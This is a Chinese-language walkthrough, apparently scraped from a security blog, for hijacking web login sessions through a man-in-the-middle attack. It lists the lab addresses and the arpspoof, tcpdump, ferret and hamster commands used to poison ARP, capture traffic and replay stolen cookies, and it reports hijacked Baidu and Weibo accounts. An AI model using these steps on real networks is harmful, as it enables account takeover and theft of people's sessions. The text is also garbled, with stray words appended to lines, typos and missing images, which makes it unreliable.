中間人攻擊之劫持登陸會話(cookies)

關於中間人攻擊 web

中間人攻擊(Man-in-the-MiddleAttack,簡稱"MITM攻擊")是一種"間接"的入侵攻擊,這種攻擊模式是經過各類技術手段將受入侵者控制的一臺計算機虛擬放置在網絡鏈接中的兩臺通訊計算機之間,這臺計算機就稱爲"中間人" 瀏覽器

由於FreeBuf幾位前輩已經給出了大量的中間人攻擊的方法,這裏就再也不重複了。剛好看到FreeBuf目前沒有關於中間人攻擊劫持登錄回話的文章,因此就有了下面。 安全

視頻下載地址:http://pan.baidu.com/s/1mgicyt6 提取碼:o1ws cookie

注:本文提供的攻擊測試方法僅供安全學習教學用途,禁止非法使用 網絡

關於抓取cookies的手記tcp

要echo下,實現流量的轉發,要不目標是上不了網的。工具

arpspoof 進行arp欺騙學習

首先抓取包wireshark:選擇本地網卡eth0,star抓取流量。測試

這時候等待用戶登陸,獲取流量信息。獲取成功後保存pacp格式。spa

用ferret加載cookies達到重寫流量信息:命令以下:ferret -r chookies.pacp

重寫以後生產hamster.txt

這時候運行hamster重放流量,而後代理hettp剩下 的我就很少說了

user。qonze你懂得

0×00

用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 進行ARP欺騙

tcpdump抓去打到本地的數據包

Ferret用來處理抓下來的數據包的

Hamster跟ferret配合使用,提供一個web服務來讓咱們交互控制。

0×01

拓撲環境:

攻擊機:Kali 192.168.1.120

    

受害機:Windows7 192.168.1.100

    

網關:192.168.1.1

0×02

    個人幾個社區賬號都是登陸狀態,固然未登陸也是能夠劫持的

    

    

    

先看下我在Kali的機器上是未登陸的    

 

    

    

0×03

開始arp欺騙

  

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

0×04

    捕獲數據包

        

命令:tcpdump -i eth0 -w cookie.cap

0×05

模擬受害者登陸

受害者在受害機器上就隨便刷新一下或者登陸一下

完畢

下面咱們開始重點

0×06

處理抓去的數據包

ferret -r cookie.cap

自動生成了 hamster.txt

  

0×07

開啓hamster服務

      

0×08

打開瀏覽器,使用代理

0×09

打開hamster 瀏覽器輸入http://hamster

    

選擇目標

    

0x0A    

找敏感地址

   

0x0B

百度劫持成功

   

微博劫持成功

    

都成功了

    

   

0x0C

我在實驗的時候遇見一個問題,就是忽然上不到網

下面教你們解決

編輯/etc/NetworkManager/NetworkManager.conf

    

vi /etc/NetworkManager/NetworkManager.conf

改爲true後保存

    

service network-manager restart

重啓服務 

相關文章
相關標籤/搜索